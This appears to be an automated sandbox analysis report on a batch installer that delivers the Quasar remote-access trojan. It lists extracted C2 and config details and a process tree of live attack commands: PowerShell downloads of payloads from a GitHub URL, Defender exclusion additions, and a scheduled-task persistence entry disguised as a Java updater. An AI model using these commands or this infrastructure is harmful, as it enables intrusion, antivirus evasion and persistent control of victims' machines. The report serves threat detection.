Analysis

  • max time kernel
    147s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    23-11-2024 17:40

General

  • Target

    CritScriptInstaller.bat

  • Size

    6KB

  • MD5

    a3ea9257f9f074a20df56d8978be9e77

  • SHA1

    68d029092c7a591aac215e25269329c3c3859436

  • SHA256

    32d2658a968790aa0039cf23fd097da860b938fb07d8d0b2f6779a71f40817b1

  • SHA512

    a61143e0680eb03fbf625da8a58aa338e88f0e12c65a3c07b2c10eead02e7a753d64e3d4271c34b04941ef772d3e772f28b53355b1a46ce4fc6aafff164c3b46

  • SSDEEP

    192:k+6tCGPbseHYtPpUaYIKopCA8KyiXn2rCxHF:kviPpUaYIKor2i

Malware Config

Extracted

  • Family
    quasar
  • Version
    1.4.1
  • Botnet
    DDNS
  • C2
    193.161.193.99:32471
  • Mutex
    807f3187-d087-4fff-beff-e73293a32af8

Attributes

  • encryption_key
    81A0C14D4C705B3C678E573C849DE7F6A3671A8B
  • install_name
    jusched.exe
  • log_directory
    CachedLogs
  • reconnect_delay
    3000
  • startup_key
    Java Update Scheduler
  • subdirectory
    Java

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar family
  • Quasar payload 3 IoCs
  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

    Powershell Invoke Web Request.

  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up the country code configured in the registry, likely a geofence check.

  • Deletes itself 1 IoCs
  • Executes dropped EXE 4 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Delays execution with timeout.exe 2 IoCs
  • Modifies registry class 2 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 17 IoCs
  • Suspicious use of AdjustPrivilegeToken 11 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 37 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\CritScriptInstaller.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3764
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Powershell -Command "Invoke-Webrequest 'https://raw.githubusercontent.com/Xevioo/XevioHub/main/CritScript.bat' -OutFile CritScript.bat"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4328
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K CritScript.bat
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4132
      • C:\Windows\system32\cacls.exe
        "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
        3⤵
          PID:2328
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin/Desktop'"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3908
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin/Downloads'"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3588
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin/AppData/'"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3568
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command "Invoke-WebRequest 'https://raw.githubusercontent.com/Xevioo/XevioHub/main/CritScript.exe' -OutFile CritScript.exe"
          3⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4812
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command "Invoke-WebRequest 'https://raw.githubusercontent.com/Xevioo/XevioHub/main/ahk.ico' -OutFile ahk.ico"
          3⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2316
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command "Invoke-WebRequest 'https://raw.githubusercontent.com/Xevioo/XevioHub/main/shortcut.ps1' -OutFile shortcut.ps1"
          3⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3396
        • C:\Users\Admin\AppData\Local\Temp\CritScript.exe
          CritScript.exe
          3⤵
          • Checks computer location settings
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Modifies registry class
          • Suspicious use of WriteProcessMemory
          PID:4004
          • C:\Users\Admin\AppData\Local\Temp\JUSCHED.EXE
            "C:\Users\Admin\AppData\Local\Temp\JUSCHED.EXE"
            4⤵
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:4384
            • C:\Windows\SYSTEM32\schtasks.exe
              "schtasks" /create /tn "Java Update Scheduler" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Java\jusched.exe" /rl HIGHEST /f
              5⤵
              • Scheduled Task/Job: Scheduled Task
              PID:4600
            • C:\Users\Admin\AppData\Roaming\Java\jusched.exe
              "C:\Users\Admin\AppData\Roaming\Java\jusched.exe"
              5⤵
              • Executes dropped EXE
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:3940
              • C:\Windows\SYSTEM32\schtasks.exe
                "schtasks" /create /tn "Java Update Scheduler" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Java\jusched.exe" /rl HIGHEST /f
                6⤵
                • Scheduled Task/Job: Scheduled Task
                PID:1500
        • C:\Windows\system32\timeout.exe
          timeout /t 5 /nobreak
          3⤵
          • Delays execution with timeout.exe
          PID:1156
        • C:\Users\Admin\AppData\Local\Temp\JUSCHED.EXE
          jusched.exe
          3⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          PID:4128
        • C:\Windows\system32\timeout.exe
          timeout /t 5 /nobreak
          3⤵
          • Delays execution with timeout.exe
          PID:1908
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\shortcut.ps1"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Deletes itself
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1128
    • C:\Windows\system32\OpenWith.exe
      C:\Windows\system32\OpenWith.exe -Embedding
      1⤵
      • Modifies registry class
      • Suspicious use of SetWindowsHookEx
      PID:4964

    MITRE ATT&CK Enterprise v15

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\jusched.exe.log

      Filesize

      1KB

      MD5

      baf55b95da4a601229647f25dad12878

      SHA1

      abc16954ebfd213733c4493fc1910164d825cac8

      SHA256

      ee954c5d8156fd8890e582c716e5758ed9b33721258f10e758bdc31ccbcb1924

      SHA512

      24f502fedb1a305d0d7b08857ffc1db9b2359ff34e06d5748ecc84e35c985f29a20d9f0a533bea32d234ab37097ec0481620c63b14ac89b280e75e14d19fd545

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

      Filesize

      2KB

      MD5

      2f57fde6b33e89a63cf0dfdd6e60a351

      SHA1

      445bf1b07223a04f8a159581a3d37d630273010f

      SHA256

      3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

      SHA512

      42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      3b2a05f3fbe16d06391db3335944b77c

      SHA1

      1ecab602face79029c53e2dddb49a12b7a808a79

      SHA256

      185551abd0332fddc9593c6f5e6d982c4917ce2e418d56ac45b0537c13ed5d60

      SHA512

      782ecdda938503b560c23a12c3ec5ab8c81590d36f3a7e866cd27c2d26c30339fc71ef770be0d422fd43ff8fb2f3ac665776c86be4a9d9d0a2e9cd9236ce0fc5

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      7ab00d2b8ad3a0a8426f6a535086b700

      SHA1

      5b912f4345328372093354ff2ba6a932fef4a8ab

      SHA256

      cc27d1633ff5a4401c75569e6cd8f98e7ab09f01b8dfb0399f82efe197e0ca0c

      SHA512

      839e5fbdcc406cee2f37a156ccbb772a80a0231508a7925f95e162990b31ea8366442fcd6073c9035905b47a34d60a3434cc776babf9d49521663b8d3e400584

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      64B

      MD5

      8a424e81b5a6078deff05e153c04a0ee

      SHA1

      bf209de0dbc1dbe7c5b5b511bd34bf447a3c049b

      SHA256

      79ce6d6caea4a9eabf8fdbb2a1c58d43fb5a3c500c2dec3fce87c160d2c6bda3

      SHA512

      aa01195e5c1d641304b08fed4a3bffc916972aa0bc20e928204cef1783f38922a03b761cf2010ccbace1ea0d2f18cda4eaeee4d8969f32fbae5f580e4e38522d

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      64B

      MD5

      446dd1cf97eaba21cf14d03aebc79f27

      SHA1

      36e4cc7367e0c7b40f4a8ace272941ea46373799

      SHA256

      a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

      SHA512

      a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      1dffbab5ecc6d06e8b259ad505a0dc2a

      SHA1

      0938ec61e4af55d7ee9d12708fdc55c72ccb090c

      SHA256

      a9d2e6d35c5e9b94326042c6f2fe7ef381f25a0c02b8a559fc1ee888ccffb18e

      SHA512

      93209a16400574416f6f992c2d403acc399179fc911818c4967c9a0211924486878578d1c98ba3bc9e269012603c96ab118a291bf53c57d8af9ab48f9e7b9b76

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      86f1b58eabec7e21739a4df55d272c7c

      SHA1

      9df879518b19a9c8e2633696a2096990fe99e9ab

      SHA256

      2fa1176643443c45f51312be88effd28bcf7bb4309123cee363daa02afcf07a8

      SHA512

      20d60b79c69ebc1eb695227abbd014625e1dfe527c0c31f245169e09d3c61238a7b357a1a252b594424a0dfa9abde7a3123b5b8660342a7e32dbccb6fbc5ea22

    • C:\Users\Admin\AppData\Local\Temp\CritScript.bat

      Filesize

      2KB

      MD5

      42b967e318ec3384c82049f18bff79f5

      SHA1

      c719bfd3fe63989c68c170e59ae8aa5ccb479b25

      SHA256

      6a5596feba2d73f3390ede572e09c3edce0da3df1e679838cdb51dc7c1df805e

      SHA512

      b578ada683bfa871a19baad1c62b04315c2fdb4e193371971202e0476470e75fe8a9fc5cb75b6a79f73657ce35a1e10929f5df585634fcb9a755b6ba4193f166

    • C:\Users\Admin\AppData\Local\Temp\CritScript.exe

      Filesize

      3.2MB

      MD5

      c28dc010fc5198442496bc07dd50cd5d

      SHA1

      0f90a005815c2700a65ea85ae86f13a182cc11e6

      SHA256

      1b701daded4124260a49040d83dec15c627b8e4a1a04dc378aae7fecfca3abf3

      SHA512

      7c94bafa48db045a864a778a010a7d1d03204828bd103a86c1267732a51260b0e689a799cc7e95410ceedd1254fb91aa3f19f62efa3e41e40be645862a4e07e2

    • C:\Users\Admin\AppData\Local\Temp\JUSCHED.EXE

      Filesize

      3.1MB

      MD5

      bd4dcbdfdb5fdc1f95bd1168f166153a

      SHA1

      9db60cf0f8a8b88d3c4601df25963536aaeb1884

      SHA256

      902bea9e4aeeed4e0b5d30a9cbcc6f9f1fc687b79c3fdde8258b94b410d1797a

      SHA512

      26ef32fe83a4e6c9c293910e96da431ba6b46b645969b9c56808d451875b0a3f4baad697362d7342f9d4822b84682b7705c2097839c796369503ffbfaa72aab2

    • C:\Users\Admin\AppData\Local\Temp\ZOMBIES.AHK

      Filesize

      6KB

      MD5

      4378ec2852917fed7f557291e72251a6

      SHA1

      104b3e944a713760b1fe491679ff3aa0af32298b

      SHA256

      2ba38af1ffa558f31af78ae94c3369d92366838d5cb1e5c01c58369bc92ac914

      SHA512

      162541d9cf8facddc824e65c0a9eb5760c95bf011ad69fdbd79890d9b44324b7e25cc3011ef2a9d0bdd351122148b8e5e9e627eb754f5383dd64bd35bd84db56

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lptya22h.tnf.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Local\Temp\shortcut.ps1

      Filesize

      2KB

      MD5

      0bd19f7c1c4e8b5ed89da56ae5f8adb0

      SHA1

      a2384a83aea7d7568fc8ebd280b7722b0efd6902

      SHA256

      62ec8d3ae53114ba6d6d2a41ee59dd4866e7cd8e2fcbd6793b0cc40bc85e622f

      SHA512

      dbd7268491aa5ec39e89f71febcdc18cb6c96bbba617a1734eef55711ed70c3bf78960e94e8595e9d3b618b9cfc2ab9ff4d8e0c73d97a0c77b504b36be573f53

    • memory/3908-29-0x00007FFCD4140000-0x00007FFCD4C01000-memory.dmp
      Filesize 10.8MB
    • memory/3908-33-0x00007FFCD4140000-0x00007FFCD4C01000-memory.dmp
      Filesize 10.8MB
    • memory/3908-30-0x00007FFCD4140000-0x00007FFCD4C01000-memory.dmp
      Filesize 10.8MB
    • memory/3908-32-0x00007FFCD4140000-0x00007FFCD4C01000-memory.dmp
      Filesize 10.8MB
    • memory/3940-116-0x000000001BD40000-0x000000001BD90000-memory.dmp
      Filesize 320KB
    • memory/3940-117-0x000000001BE50000-0x000000001BF02000-memory.dmp
      Filesize 712KB
    • memory/4328-16-0x00007FFCD4140000-0x00007FFCD4C01000-memory.dmp
      Filesize 10.8MB
    • memory/4328-12-0x00007FFCD4140000-0x00007FFCD4C01000-memory.dmp
      Filesize 10.8MB
    • memory/4328-11-0x00007FFCD4140000-0x00007FFCD4C01000-memory.dmp
      Filesize 10.8MB
    • memory/4328-0-0x00007FFCD4143000-0x00007FFCD4145000-memory.dmp
      Filesize 8KB
    • memory/4328-6-0x000001979C990000-0x000001979C9B2000-memory.dmp
      Filesize 136KB
    • memory/4384-108-0x0000000000E80000-0x00000000011A4000-memory.dmp
      Filesize 3.1MB